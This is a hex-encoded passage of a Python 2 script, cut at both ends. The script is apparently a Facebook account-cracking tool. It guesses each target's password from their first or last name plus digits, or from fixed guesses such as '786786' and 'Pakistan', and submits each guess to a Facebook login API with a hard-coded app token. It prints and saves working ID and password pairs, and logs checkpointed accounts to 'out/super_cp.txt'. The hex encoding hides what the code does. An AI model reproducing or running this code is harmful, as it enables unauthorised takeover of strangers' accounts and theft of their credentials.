D27202B207573657209090909090909090909090A090909097072696E7420275C7831625B313B39346D5B215D205C7831625B313B39316D50617373776F7264205C7831625B313B39376D3A205C7831625B313B39376D27202B207061737331202B20275C6E2709090909090909090909090A090909096
F6B732E617070656E6428757365722B7061737331290A202020202020202020202020202020202020202020202020656C73653A0A0909092020202020202020696620277777772E66616365626F6F6B2E636F6D2720696E20715B226572726F725F6D7367225D3A0A09090909202020207072696E7420275C7831625B313B39316D5B215D205C7831625B313B39366D5B436865636B706F696E745D270A09090909202020207072696E7420275C7831625B313B39326D5B215D205C7831625B313B39376D4E616D65205C7831625B313B39376D202020203A205C7831625B313B39376D27202B2062205B276E616D65275D0A09090909202020207072696E7420275C7831625B313B39336D5B215D205C7831625B313B39376D4944205C7831625B313B39376D2020202020203A205C7831625B313B39376D27202B20757365720A09090909202020207072696E7420275C7831625B313B39346D5B215D205C7831625B313B39316D50617373776F7264205C7831625B313B39376D3A205C7831625B313B39376D27202B207061737331202B20275C6E270A090909092020202063656B203D206F70656E28226F75742F73757065725F63702E747874222C20226122290A090909092020202063656B2E7772697465282249443A22202B757365722B20222050773A22202B70617373312B225C6E22290A090909092020202063656B2E636C6F736528290A090909092020202063656B706F696E742E617070656E6428757365722B7061737331290A2020202020202020202020202020202020202020202020202020202020202020656C73653A0A09090909202020207061737332203D20625B2766697273745F6E616D65275D202B202731323327090909090909090909090A20202020202020202020202020202020202020202020202020202020202020202020202064617461203D2075726C6C69622E75726C6F70656E282268747470733A2F2F622D6170692E66616365626F6F6B2E636F6D2F6D6574686F642F617574682E6C6F67696E3F6163636573735F746F6B656E3D32333737353939303935393136353525323532353743306631343061616265646662363561633237613733396564316132323633623126666F726D61743D6A736F6E2673646B5F76657273696F6E3D3226656D61696C3D222B2875736572292B22266C6F63616C653D656E5F55532670617373776F72643D222B287061737332292B222673646B3D696F732667656E65726174655F73657373696F6E5F636F6F6B6965733D31267369673D336635353566393966623631666364376161306334346635386635323265663622290909090909090909090909090A09090920202020202020202020202071203
D206A736F6E2E6C6F61642864617461290909090909090909090909090A090909202020202020202020202020696620276163636573735F746F6B656E2720696E20713A090A0909090920202020202020202020202078203D2072657175657374732E676574282268747470733A2F2F67726170682E66616365626F6F6B2E636F6D2F222B757365722B223F6163636573735F746F6B656E3D222B715B276163636573735F746F6B656E275D290A090909092020202020202020202020207A203D206A736F6E2E6C6F61647328782E74657874290A090909092020202020202020202020207072696E7420275C7831625B313B39346D5B215D205C7831625B313B39326D5B4F4B5D2709090909090909090909090A090909092020202020202020202020207072696E7420275C7831625B313B39336D5B215D205C7831625B313B39376D4E616D65205C7831625B313B39376D202020203A205C7831625B313B39376D27202B20625B276E616D65275D09090909090909090909090A090909092020202020202020202020207072696E7420275C7831625B313B39326D5B215D205C7831625B313B39376D4944205C7831625B313B39376D2020202020203A205C7831625B313B39376D27202B207573657209090909090909090A090909092020202020202020202020207072696E7420275C7831625B313B39316D5B215D205C7831625B313B39316D50617373776F7264205C7831625B313B39376D3A205C7831625B313B39376D27202B207061737332202B20275C6E2709090909090909090909090A090909092020202020202020202020206F6B732E617070656E6428757365722B7061737332290A202020202020202020202020202020202020202020202020202020202020202020202020656C73653A0A09090920202020202020202020202020202020202020696620277777772E66616365626F6F6B2E636F6D2720696E20715B226572726F725F6D7367225D3A0A090909092020202020202020202020202020207072696E7420275C7831625B313B39346D5B215D205C7831625B313B39366D5B436865636B706F696E745D270A090909092020202020202020202020202020207072696E7420275C7831625B313B39336D5B215D205C7831625B313B39376D4E616D65205C7831625B313B39336D202020203A205C7831625B313B39376D27202B20625B276E616D65275D0A090909092020202020202020202020202020207072696E7420275C7831625B313B39326D5B215D205C7831625B313B39376D4944205C7831625B313B39376D2020202020203A205C7831625B313B39376D27202B20757365720A090909092020202020202020202020202020207072696E7420275
C7831625B313B39316D5B215D205C7831625B313B39316D50617373776F7264205C7831625B313B39376D3A205C7831625B313B39376D27202B207061737332202B20275C6E270A0909090920202020202020202020202020202063656B203D206F70656E28226F75742F73757065725F63702E747874222C20226122290A0909090920202020202020202020202020202063656B2E7772697465282249443A22202B757365722B20222050773A22202B70617373322B225C6E22290A0909090920202020202020202020202020202063656B2E636C6F736528290A0909090920202020202020202020202020202063656B706F696E742E617070656E6428757365722B70617373322909090909090909090A090909092020202020202020202020656C73653A09090909090909090909090A0909090909202020202020207061737333203D20625B276C6173745F6E616D65275D2B2731323327090909090909090909090A09090909092020202020202064617461203D2075726C6C69622E75726C6F70656E282268747470733A2F2F622D6170692E66616365626F6F6B2E636F6D2F6D6574686F642F617574682E6C6F67696E3F6163636573735F746F6B656E3D32333737353939303935393136353525323532353743306631343061616265646662363561633237613733396564316132323633623126666F726D61743D6A736F6E2673646B5F76657273696F6E3D3226656D61696C3D222B2875736572292B22266C6F63616C653D656E5F55532670617373776F72643D222B287061737333292B222673646B3D696F732667656E65726174655F73657373696F6E5F636F6F6B6965733D31267369673D33663535356639396662363166636437616130633434663538663532326566362229090909090909090909090A09090909092020202020202071203D206A736F6E2E6C6F6164286461746129090909090909090909090A090909090920202020202020696620276163636573735F746F6B656E2720696E20713A090A0909090909092020202020202078203D2072657175657374732E676574282268747470733A2F2F67726170682E66616365626F6F6B2E636F6D2F222B757365722B223F6163636573735F746F6B656E3D222B715B276163636573735F746F6B656E275D290A0909090920202020202020202020202020202020202020202020207A203D206A736F6E2E6C6F61647328782E74657874290A090909090909202020202020207072696E7420275C7831625B313B39316D5B215D205C7831625B313B39326D5B4F4B5D2709090909090909090A090909090909202020202020207072696E7420275C7831625B313B39326D5B215D205C7831625B313B39376D4E6
16D65205C7831625B313B39376D202020203A205C7831625B313B39376D27202B20625B276E616D65275D0909090909090909090A090909090909202020202020207072696E7420275C7831625B313B39336D5B215D205C7831625B313B39376D4944205C7831625B313B39376D2020202020203A205C7831625B313B39376D27202B2075736572090909090909090A090909090909202020202020207072696E7420275C7831625B313B39346D5B215D205C7831625B313B39316D50617373776F7264205C7831625B313B39376D3A205C7831625B313B39376D27202B207061737333202B20275C6E270909090909090909090A090909090909202020202020206F6B732E617070656E6428757365722B7061737333290A2020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020656C73653A0A09090920202020202020202020202020202020202020202020202020202020202020696620277777772E66616365626F6F6B2E636F6D2720696E20715B226572726F725F6D7367225D3A0A090909092020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39316D5B215D205C7831625B313B39366D5B436865636B706F696E745D270A090909092020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39326D5B215D205C7831625B313B39376D4E616D65205C7831625B313B39376D202020203A205C7831625B313B39376D27202B20625B276E616D65275D0A090909092020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39336D5B215D205C7831625B313B39376D4944205C7831625B313B39376D2020202020203A205C7831625B313B39376D27202B20757365720A090909092020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39346D5B215D205C7831625B313B39316D50617373776F7264205C7831625B313B39376D3A205C7831625B313B39376D27202B207061737333202B20275C6E270A0909090920202020202020202020202020202020202020202020202020202063656B203D206F70656E28226F75742F73757065725F63702E747874222C20226122290A0909090920202020202020202020202020202020202020202020202020202063656B2E7772697465282249443A22202B757365722B20222050773A22202B70617373332B225C6E22290A0909090920202020202020202020202020202020202020202020202020202063656B2E636C6F736528290A0909090920202020202020202
020202020202020202020202020202020202063656B706F696E742E617070656E6428757365722B7061737333290909090909090909090A0909090909202020202020202020202020202020656C73653A090909090909090909090A09090909090920202020202020202020207061737334203D20625B2766697273745F6E616D65275D202B2027313132322709090909090909090909090A090909202020202020202020202020202020202020202020202020202020202020202020202064617461203D2075726C6C69622E75726C6F70656E282268747470733A2F2F622D6170692E66616365626F6F6B2E636F6D2F6D6574686F642F617574682E6C6F67696E3F6163636573735F746F6B656E3D32333737353939303935393136353525323532353743306631343061616265646662363561633237613733396564316132323633623126666F726D61743D6A736F6E2673646B5F76657273696F6E3D3226656D61696C3D222B2875736572292B22266C6F63616C653D656E5F55532670617373776F72643D222B287061737334292B222673646B3D696F732667656E65726174655F73657373696F6E5F636F6F6B6965733D31267369673D336635353566393966623631666364376161306334346635386635323265663622290909090909090909090909090A090909202020202020202020202020202020202020202020202020202020202020202020202071203D206A736F6E2E6C6F61642864617461290909090909090909090909090A0909092020202020202020202020202020202020202020202020202020202020202020202020696620276163636573735F746F6B656E2720696E20713A09090A0909090909092020202020202020202020202020202020202078203D2072657175657374732E676574282268747470733A2F2F67726170682E66616365626F6F6B2E636F6D2F222B757365722B223F6163636573735F746F6B656E3D222B715B276163636573735F746F6B656E275D290A0909090920202020202020202020202020202020202020202020202020202020202020202020207A203D206A736F6E2E6C6F61647328782E74657874290A0909090920202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39346D5B215D205C7831625B313B39326D5B4F4B5D2709090909090909090909090A0909090920202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39336D5B215D205C7831625B313B39376D4E616D65205C7831625B313B39376D202020203A205C7831625B313B39376D27202B20625B276E616D65275D0
9090909090909090909090A0909090920202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39326D5B215D205C7831625B313B39376D4944205C7831625B313B39376D2020202020203A205C7831625B313B39376D27202B207573657209090909090909090909090A0909090920202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39316D5B215D205C7831625B313B39316D50617373776F7264205C7831625B313B39376D3A205C7831625B313B39376D27202B207061737334202B20275C6E2709090909090909090909090A0909090920202020202020202020202020202020202020202020202020202020202020202020206F6B732E617070656E6428757365722B7061737334290A2020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020656C73653A0A09090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020696620277777772E66616365626F6F6B2E636F6D2720696E20715B226572726F725F6D7367225D3A0A090909092020202020202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39346D5B215D205C7831625B313B39366D5B436865636B706F696E745D270A090909092020202020202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39336D5B215D205C7831625B313B39376D4E616D65205C7831625B313B39376D202020203A205C7831625B313B39376D27202B20625B276E616D65275D0A090909092020202020202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39326D5B215D205C7831625B313B39376D4944205C7831625B313B39376D2020202020203A205C7831625B313B39376D27202B20757365720A090909092020202020202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39316D5B215D205C7831625B313B39316D50617373776F7264205C7831625B313B39376D3A205C7831625B313B39376D27202B207061737334202B20275C6E270A0909090920202020202020202020202020202020202020202020202020202020202020202020202020202063656B203D206F70656E28226F75742F73757065725F63702E747874222C20226122290A09090
90920202020202020202020202020202020202020202020202020202020202020202020202020202063656B2E7772697465282249443A22202B757365722B20222050773A22202B70617373342B225C6E22290A0909090920202020202020202020202020202020202020202020202020202020202020202020202020202063656B2E636C6F736528290A0909090920202020202020202020202020202020202020202020202020202020202020202020202020202063656B706F696E742E617070656E6428757365722B70617373342909090909090A0909090909202020202020202020202020202020202020202020202020202020656C73653A0909090909090909090A09090909090920202020202020202020202020202020202020202020207061737335203D202737383637383627090909090909090A090909090909202020202020202020202020202020202020202020202064617461203D2075726C6C69622E75726C6F70656E282268747470733A2F2F622D6170692E66616365626F6F6B2E636F6D2F6D6574686F642F617574682E6C6F67696E3F6163636573735F746F6B656E3D32333737353939303935393136353525323532353743306631343061616265646662363561633237613733396564316132323633623126666F726D61743D6A736F6E2673646B5F76657273696F6E3D3226656D61696C3D222B2875736572292B22266C6F63616C653D656E5F55532670617373776F72643D222B287061737335292B222673646B3D696F732667656E65726174655F73657373696F6E5F636F6F6B6965733D31267369673D3366353535663939666236316663643761613063343466353866353232656636222909090909090909090A090909090909202020202020202020202020202020202020202020202071203D206A736F6E2E6C6F616428646174612909090909090909090A0909090909092020202020202020202020202020202020202020202020696620276163636573735F746F6B656E2720696E20713A090A0909090909092020202020202020202020202020202020202020202020202020202020202078203D2072657175657374732E676574282268747470733A2F2F67726170682E66616365626F6F6B2E636F6D2F222B757365722B223F6163636573735F746F6B656E3D222B715B276163636573735F746F6B656E275D290A0909090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020207A203D206A736F6E2E6C6F61647328782E74657874290A090909090909202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B3
9376D5B215D205C7831625B313B39326D5B4F4B5D270909090909090A090909090909202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39376D5B215D205C7831625B313B39376D4E616D65205C7831625B313B39376D202020203A205C7831625B313B39376D27202B20625B276E616D65275D090909090909090A090909090909202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39376D5B215D205C7831625B313B39376D4944205C7831625B313B39376D2020202020203A205C7831625B313B39376D27202B207573657209090909090A090909090909202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39376D5B215D205C7831625B313B39316D50617373776F7264205C7831625B313B39376D3A205C7831625B313B39376D27202B207061737335202B20275C6E27090909090909090A090909090909202020202020202020202020202020202020202020202020202020202020206F6B732E617070656E6428757365722B706173733529090A2020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020656C73653A0A09090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020696620277777772E66616365626F6F6B2E636F6D2720696E20715B226572726F725F6D7367225D3A0A090909092020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39376D5B215D205C7831625B313B39366D5B436865636B706F696E745D270A090909092020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39376D5B215D205C7831625B313B39376D4E616D65205C7831625B313B39376D202020203A205C7831625B313B39376D27202B20625B276E616D65275D0A090909092020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39376D5B215D205C7831625B313B39376D4944205C7831625B313B39376D2020202020203A205C7831625B313B39376D27202B20757365720A0909090920202020202020202020202020202020202
02020202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39376D5B215D205C7831625B313B39316D50617373776F7264205C7831625B313B39376D3A205C7831625B313B39376D27202B207061737335202B20275C6E270A0909090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202063656B203D206F70656E28226F75742F73757065725F63702E747874222C20226122290A0909090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202063656B2E7772697465282249443A22202B757365722B20222050773A22202B70617373352B225C6E22290A0909090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202063656B2E636C6F736528290A0909090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202063656B706F696E742E617070656E6428757365722B70617373352909090909090A09090909090920202020202020202020202020202020202020202020202020202020202020656C73653A09090909090909090A090909090909092020202020202020202020202020202020202020202020202020207061737336203D202750616B697374616E2709090909090909090909090A090909202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202064617461203D2075726C6C69622E75726C6F70656E282268747470733A2F2F622D6170692E66616365626F6F6B2E636F6D2F6D6574686F642F617574682E6C6F67696E3F6163636573735F746F6B656E3D32333737353939303935393136353525323532353743306631343061616265646662363561633237613733396564316132323633623126666F726D61743D6A736F6E2673646B5F76657273696F6E3D3226656D61696C3D222B2875736572292B22266C6F63616C653D656E5F55532670617373776F72643D222B287061737336292B222673646B3D696F732667656E65726174655F73657373696F6E5F636F6F6B6965733D31267369673D336635353566393966623631666364376161306334346635386635323265663622290909090909090909090909090A090909202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202071203D206A7
36F6E2E6C6F61642864617461290909090909090909090909090A0909092020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020696620276163636573735F746F6B656E2720696E20713A090A090909090909090920202020202020202020202020202020202020202020202020202078203D2072657175657374732E676574282268747470733A2F2F67726170682E66616365626F6F6B2E636F6D2F222B757365722B223F6163636573735F746F6B656E3D222B715B276163636573735F746F6B656E275D290A0909090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020207A203D206A736F6E2E6C6F61647328782E74657874290A0909090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39376D5B215D205C7831625B313B39326D5B4F4B5D2709090909090909090909090A0909090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39376D5B215D205C7831625B313B39376D4E616D65205C7831625B313B39376D202020203A205C7831625B313B39376D27202B20625B276E616D65275D09090909090909090909090A0909090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39376D5B215D205C7831625B313B39376D4944205C7831625B313B39376D2020202020203A205C7831625B313B39376D27202B20757365720909090909090909090A0909090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39376D5B215D205C7831625B313B39316D50617373776F7264205C7831625B313B39376D3A205C7831625B313B39376D27202B207061737336202B20275C6E2709090909090909090909090A0909090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020206F6B732E617070656E6428757365722B7061737336290A202020202020202020202020202020202020202020202020202020202020202020202
0202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020656C73653A0A09090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020696620277777772E66616365626F6F6B2E636F6D2720696E20715B226572726F725F6D7367225D3A0A090909092020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39376D5B215D205C7831625B313B39366D5B436865636B706F696E745D270A090909092020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39376D5B215D205C7831625B313B39376D4E616D65205C7831625B313B39376D202020203A205C7831625B313B39376D27202B20625B276E616D65275D0A090909092020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39376D5B215D205C7831625B313B39376D4944205C7831625B313B39376D2020202020203A205C7831625B313B39376D27202B20757365720A090909092020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39376D5B215D205C7831625B313B39316D50617373776F7264205C7831625B313B39376D3A205C7831625B313B39376D27202B207061737336202B20275C6E270A0909090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202063656B203D206F70656E28226F75742F73757065725F63702E747874222C20226122290A0909090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202063656B2E7772697465282249443A22202B757365722B20222050773A22202B70617373362B225C6E22290A0909090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202063656B2E636C6F736528290A0909090
920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202063656B706F696E742E617070656E6428757365722B706173733629090A09090909090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020656C73653A090909090909090A0909090909090909202020202020202020202020202020202020202020202020202020202020207061737337203D20625B2766697273745F6E616D65275D2B273132333435270909090909090A09090909090909092020202020202020202020202020202020202020202020202020202020202064617461203D2075726C6C69622E75726C6F70656E282268747470733A2F2F622D6170692E66616365626F6F6B2E636F6D2F6D6574686F642F617574682E6C6F67696E3F6163636573735F746F6B656E3D32333737353939303935393136353525323532353743306631343061616265646662363561633237613733396564316132323633623126666F726D61743D6A736F6E2673646B5F76657273696F6E3D3226656D61696C3D222B2875736572292B22266C6F63616C653D656E5F55532670617373776F72643D222B287061737337292B222673646B3D696F732667656E65726174655F73657373696F6E5F636F6F6B6965733D31267369673D336635353566393966623631666364376161306334346635386635323265663622290909090909090A09090909090909092020202020202020202020202020202020202020202020202020202020202071203D206A736F6E2E6C6F61642864617461290909090909090A090909090909090920202020202020202020202020202020202020202020202020202020202020696620276163636573735F746F6B656E2720696E20713A09090A09090909202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202078203D2072657175657374732E676574282268747470733A2F2F67726170682E66616365626F6F6B2E636F6D2F222B757365722B223F6163636573735F746F6B656E3D222B715B276163636573735F746F6B656E275D290A0909090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020207A203D206A736F6E2E6C6F61647328782E74657874290A090909090909090909202020202020202020202020202020202020202020202020202020202020207072696E742
0275C7831625B313B39316D5B215D205C7831625B313B39326D5B4F4B5D2709090909090A090909090909090909202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39326D5B215D205C7831625B313B39376D4E616D65205C7831625B313B39376D202020203A205C7831625B313B39376D27202B20625B276E616D65275D09090909090A090909090909090909202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39336D5B215D205C7831625B313B39376D4944205C7831625B313B39376D2020202020203A205C7831625B313B39376D27202B2075736572090909090A090909090909090909202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39346D5B215D205C7831625B313B39316D50617373776F7264205C7831625B313B39376D3A205C7831625B313B39376D27202B207061737337202B20275C6E2709090909090A090909090909090909202020202020202020202020202020202020202020202020202020202020206F6B732E617070656E6428757365722B7061737337290A2020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020656C73653A0A09090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020696620277777772E66616365626F6F6B2E636F6D2720696E20715B226572726F725F6D7367225D3A0A090909092020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39316D5B215D205C7831625B313B39366D5B436865636B706F696E745D270A090909092020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39326D5B215D205C7831625B313B39376D4E616D65205C7831625B313B39376D202020203A205C7831625B313B39376D27202B20625B276E616D65275D0A090909092020202020202020202020202020202020202020202020202020202020202020202
020202020202020202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39336D5B215D205C7831625B313B39376D4944205C7831625B313B39376D2020202020203A205C7831625B313B39376D27202B20757365720A090909092020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39346D5B215D205C7831625B313B39316D50617373776F7264205C7831625B313B39376D3A205C7831625B313B39376D27202B207061737337202B20275C6E270A0909090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202063656B203D206F70656E28226F75742F73757065725F63702E747874222C20226122290A0909090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202063656B2E7772697465282249443A22202B757365722B20222050773A22202B70617373372B225C6E22290A0909090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202063656B2E636C6F736528290A0909090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202063656B706F696E742E617070656E6428757365722B706173733729202020202020202020202009090909090A0909090909090909202020202020202020202020202020202020202020202020202020202020202020202020202020656C73653A0909090909090A090909090909090909092020202020202020202020202020202020202020202020202020207061737338203D2027303030373836270909090909090909090A090909202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202064617461203D2075726C6C69622E75726C6F70656E282268747470733A2F2F622D6170692E66616365626F6F6B2E636F6D2F6D6574686F642F617574682E6C6F67696E3F61636
36573735F746F6B656E3D32333737353939303935393136353525323532353743306631343061616265646662363561633237613733396564316132323633623126666F726D61743D6A736F6E2673646B5F76657273696F6E3D3226656D61696C3D222B2875736572292B22266C6F63616C653D656E5F55532670617373776F72643D222B287061737338292B222673646B3D696F732667656E65726174655F73657373696F6E5F636F6F6B6965733D31267369673D336635353566393966623631666364376161306334346635386635323265663622290909090909090909090909090A090909202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202071203D206A736F6E2E6C6F61642864617461290909090909090909090909090A0909092020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020696620276163636573735F746F6B656E2720696E20713A09090A09090909090909090909202020202020202020202020202020202020202020202020202020202020202020202078203D2072657175657374732E676574282268747470733A2F2F67726170682E66616365626F6F6B2E636F6D2F222B757365722B223F6163636573735F746F6B656E3D222B715B276163636573735F746F6B656E275D290A0909090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020207A203D206A736F6E2E6C6F61647328782E74657874290A0909090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39376D5B215D205C7831625B313B39326D5B4F4B5D2709090909090909090909090A0909090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39376D5B215D205C7831625B313B39376D4E616D65205C7831625B313B39376D202020203A205C7831625B313B39376D27202B20625B276E616D65275D090
90909090909090909090A0909090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39376D5B215D205C7831625B313B39376D4944205C7831625B313B39376D2020202020203A205C7831625B313B39376D27202B2075736572090909090909090909090A0909090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39376D5B215D205C7831625B313B39316D50617373776F7264205C7831625B313B39376D3A205C7831625B313B39376D27202B207061737338202B20275C6E2709090909090909090909090A0909090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020206F6B732E617070656E6428757365722B7061737338290A2020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020656C73653A0A09090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020696620277777772E66616365626F6F6B2E636F6D2720696E20715B226572726F725F6D7367225D3A0A090909092020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39376D5B215D205C7831625B313B39366D5B436865636B706F696E745D270A090909092020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39376D5B215D205C7831625B313B39376D4E616D65205C7831625B313B39376D202020203A205C7831625B313B3
9376D27202B20625B276E616D65275D0A090909092020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39376D5B215D205C7831625B313B39376D4944205C7831625B313B39386D2020202020203A205C7831625B313B39376D27202B20757365720A090909092020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39376D5B215D205C7831625B313B39316D50617373776F7264205C7831625B313B39376D3A205C7831625B313B39376D27202B207061737338202B20275C6E270A0909090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202063656B203D206F70656E28226F75742F73757065725F63702E747874222C20226122290A0909090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202063656B2E7772697465282249443A22202B757365722B20222050773A22202B70617373382B225C6E22290A0909090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202063656B2E636C6F736528290A0909090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202063656B706F696E742E617070656E6428757365722B706173733829202020090A090909090909090909092020202020202020202020202020202020202020202020202020202020202020202020656C73653A09090909090A090909090909090909092020202020202020202020202020202020202020202020202020202020202020202020202020207061737339203D20625B2766697273745F6E616D65275D202B20273738362709090909090A090909090909090909092020202020202020202020202
0202020202020202020202020202020202020202020202020202064617461203D2075726C6C69622E75726C6F70656E282268747470733A2F2F622D6170692E66616365626F6F6B2E636F6D2F6D6574686F642F617574682E6C6F67696E3F6163636573735F746F6B656E3D32333737353939303935393136353525323532353743306631343061616265646662363561633237613733396564316132323633623126666F726D61743D6A736F6E2673646B5F76657273696F6E3D3226656D61696C3D222B2875736572292B22266C6F63616C653D656E5F55532670617373776F72643D222B287061737339292B222673646B3D696F732667656E65726174655F73657373696F6E5F636F6F6B6965733D31267369673D33663535356639396662363166636437616130633434663538663532326566362229090909090A0909090909090909090920202020202020202020202020202020202020202020202020202020202020202020202020202071203D206A736F6E2E6C6F6164286461746129090909090A09090909090909090909202020202020202020202020202020202020202020202020202020202020202020202020202020696620276163636573735F746F6B656E2720696E20713A09090A090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202078203D2072657175657374732E676574282268747470733A2F2F67726170682E66616365626F6F6B2E636F6D2F222B757365722B223F6163636573735F746F6B656E3D222B715B276163636573735F746F6B656E275D290A0909090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020207A203D206A736F6E2E6C6F61647328782E74657874290A09090909090909090909092020202020202020202020202020202020202020202020202020202020202020202020202020207072696